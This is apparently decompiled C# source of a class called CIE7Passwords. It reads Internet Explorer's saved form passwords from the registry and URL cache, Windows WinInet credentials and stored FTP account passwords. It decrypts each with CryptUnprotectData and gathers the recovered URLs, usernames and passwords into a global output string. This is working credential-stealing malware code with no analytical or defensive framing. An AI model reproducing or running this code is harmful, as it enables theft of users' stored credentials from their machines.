// Token: 0x060000B5 RID: 181 RVA: 0x00006E38 File Offset: 0x00005038 private void AddPasswdInfo(string strRess, int hKey) { strRess = Strings.LCase(strRess); byte[] bytes = Encoding.Unicode.GetBytes(strRess); string text = this.GetSHA1Hash(ref bytes); text += Strings.Right("00" + Conversion.Hex(this.CheckSum(ref text)), 2); int num2; int num3; int num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, IntPtr.Zero, ref num3); bool flag = num3 > 0; if (flag) { IntPtr lpData = Marshal.AllocHGlobal(num3); num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, lpData, ref num3); CIE7Passwords.DATA_BLOB data_BLOB; data_BLOB.cbData = num3; data_BLOB.pbData = lpData.ToInt32(); CIE7Passwords.DATA_BLOB data_BLOB2; data_BLOB2.cbData = checked (Strings.Len(strRess) * 2 + 2); IntPtr hglobal = Marshal.StringToHGlobalUni(strRess); data_BLOB2.pbData = hglobal.ToInt32(); CIE7Passwords.DATA_BLOB dataOut; CIE7Passwords.CryptUnprotectData(ref data_BLOB, 0, ref data_BLOB2, 0, 0, 0, ref dataOut); this.ProcessIEPass(strRess, text, dataOut); hglobal = new IntPtr(data_BLOB2.pbData); Marshal.FreeHGlobal(hglobal); CIE7Passwords.LocalFree(dataOut.pbData); } }
// Token: 0x060000B7 RID: 183 RVA: 0x00006F5C File Offset: 0x0000515C public void Refresh() { checked { try { Regex regex = new Regex("name=\"([^\"]+)\"", RegexOptions.Compiled); int hKey = -2147483647; string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage1"; int num; CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131097, ref num); int hKey2 = -2147483647; text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"; int num2; CIE7Passwords.RegOpenKeyEx(hKey2, ref text, 0, 131097, ref num2); bool flag = num2 != 0 || num != 0; if (flag) { text = null; int num4; int num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, IntPtr.Zero, ref num4); flag = (num4 > 0); if (flag) { IntPtr intPtr = Marshal.AllocHGlobal(num4); Marshal.WriteInt32(intPtr, num4); text = null; num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, intPtr, ref num4); do { CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO; object obj = Marshal.PtrToStructure(intPtr, internet_CACHE_ENTRY_INFO.GetType()); CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO2; internet_CACHE_ENTRY_INFO = ((obj != null) ? ((CIE7Passwords.INTERNET_CACHE_ENTRY_INFO)obj) : internet_CACHE_ENTRY_INFO2); flag = ((internet_CACHE_ENTRY_INFO.CacheEntryType & 2097153) != 0); if (flag) { IntPtr intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszSourceUrlName); string text2 = this.GetStrFromPtrA(intPtr2); flag = (text2.IndexOf("?") >= 0); if (flag) { text2 = text2.Substring(0, text2.IndexOf("?")); } flag = (Strings.InStr(text2, "@", CompareMethod.Binary) > 0); if (flag) { text2 = Strings.Mid(text2, Strings.InStr(text2, "@", CompareMethod.Binary) + 1); } flag = (num != 0 && (internet_CACHE_ENTRY_INFO.CacheEntryType & 1) == 1); if (flag) { intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpHeaderInfo); string strFromPtrA = this.GetStrFromPtrA(intPtr2); flag = (!string.IsNullOrEmpty(strFromPtrA) && strFromPtrA.Contains("text/html")); if (flag) { intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszLocalFileName); string strFromPtrA2 = this.GetStrFromPtrA(intPtr2); try { try { foreach (object obj2 in regex.Matches(File.ReadAllText(strFromPtrA2))) { Match match = (Match)obj2; this.AddPasswdInfo(match.Groups[1].Value, num); } } finally { IEnumerator enumerator; flag = (enumerator is IDisposable); if (flag) { (enumerator as IDisposable).Dispose(); } } } catch (Exception ex) { } } } this.AddPasswdInfo(text2, num2); } num4 = 0; CIE7Passwords.FindNextUrlCacheEntry(num3, IntPtr.Zero, ref num4); Marshal.FreeHGlobal(intPtr); flag = (num4 > 0); if (flag) { intPtr = Marshal.AllocHGlobal(num4); Marshal.WriteInt32(intPtr, num4); } }while (CIE7Passwords.FindNextUrlCacheEntry(num3, intPtr, ref num4) != 0); CIE7Passwords.FindCloseUrlCache(num3); } CIE7Passwords.RegCloseKey(num); CIE7Passwords.RegCloseKey(num2); } string lpszFilter = "Microsoft_WinInet_*"; int num5; int num6; CIE7Passwords.CredEnumerate(lpszFilter, 0, ref num5, ref num6); short[] array = new short[37]; flag = (num5 > 0); CIE7Passwords.DATA_BLOB data_BLOB; CIE7Passwords.DATA_BLOB data_BLOB2; CIE7Passwords.DATA_BLOB data_BLOB3; if (flag) { int num7 = 0; int num8 = num5 - 1; int num9 = num7; for (;;) { int num10 = num9; int num11 = num8; if (num10 > num11) { break; } IntPtr intPtr2 = new IntPtr(num6 + num9 * 4); IntPtr intPtr = Marshal.ReadIntPtr(intPtr2); CIE7Passwords.CREDENTIAL credential; object obj3 = Marshal.PtrToStructure(intPtr, credential.GetType()); CIE7Passwords.CREDENTIAL credential2; credential = ((obj3 != null) ? ((CIE7Passwords.CREDENTIAL)obj3) : credential2); intPtr2 = new IntPtr(credential.lpstrTargetName); string str = this.CopyString(intPtr2); data_BLOB.cbData = 74; intPtr = Marshal.AllocHGlobal(74); string str2 = "abe2869f-9b47-4cd9-a358-c22904dba7f7\0"; int num12 = 0; int num13; do { Marshal.WriteInt16(intPtr, num12 * 2, (short)(Strings.Asc(Strings.Mid(str2, num12 + 1, 1)) * 4)); num12++; num13 = num12; num11 = 36; }while (num13 <= num11); data_BLOB.pbData = intPtr.ToInt32(); data_BLOB2.pbData = credential.lpbCredentialBlob; data_BLOB2.cbData = credential.dwCredentialBlobSize; data_BLOB3.cbData = 0; data_BLOB3.pbData = 0; CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3); Marshal.FreeHGlobal(intPtr); intPtr2 = new IntPtr(data_BLOB3.pbData); string expression = Marshal.PtrToStringUni(intPtr2); string[] array2 = Strings.Split(expression, ":", -1, CompareMethod.Binary); int num14 = Strings.InStr(Strings.Mid(str, 19), "/", CompareMethod.Binary); p.OL = string.Concat(new string[] { p.OL, "|URL| ", Strings.Mid(str, 19, num14 - 1), "\r\n|USR| ", array2[0], "\r\n|PWD| ", array2[1], "\r\n" }); CIE7Passwords.LocalFree(data_BLOB3.pbData); num9++; } } CIE7Passwords.CredFree(num6); RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\FTP\\Accounts"); foreach (string text3 in registryKey.GetSubKeyNames()) { RegistryKey registryKey2 = registryKey.OpenSubKey(text3); foreach (string text4 in registryKey2.GetSubKeyNames()) { RegistryKey registryKey3 = registryKey2.OpenSubKey(text4); byte[] array3 = (byte[])registryKey3.GetValue("Password"); byte[] array4 = new byte[4]; int num15 = 0; int num16 = text3.Length - 1; int num17 = num15; for (;;) { int num18 = num17; int num11 = num16; if (num18 > num11) { break; } byte b = (byte)(text3[num17] & '\u001f'); array4[num17 & 3] = unchecked (array4[num17 & 3] + b); num17++; } data_BLOB2.cbData = array3.Length; IntPtr intPtr2 = Marshal.AllocHGlobal(array3.Length); data_BLOB2.pbData = intPtr2.ToInt32(); byte[] source = array3; int startIndex = 0; intPtr2 = new IntPtr(data_BLOB2.pbData); Marshal.Copy(source, startIndex, intPtr2, array3.Length); data_BLOB3.cbData = 0; data_BLOB3.pbData = 0; GCHandle gchandle = GCHandle.Alloc(array4, GCHandleType.Pinned); intPtr2 = gchandle.AddrOfPinnedObject(); data_BLOB.pbData = intPtr2.ToInt32(); data_BLOB.cbData = 4; CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3); gchandle.Free(); string[] array5 = new string[8]; array5[0] = p.OL; array5[1] = "|URL| "; array5[2] = string.Format("ftp://{0}@{1}/", text3, text4); array5[3] = "\r\n|USR| "; array5[4] = text4; array5[5] = "\r\n|PWD| "; string[] array6 = array5; int num19 = 6; intPtr2 = new IntPtr(data_BLOB3.pbData); array6[num19] = Marshal.PtrToStringUni(intPtr2); array5[7] = "\r\n"; p.OL = string.Concat(array5); CIE7Passwords.LocalFree(data_BLOB3.pbData); } } } catch (Exception ex2) { } } }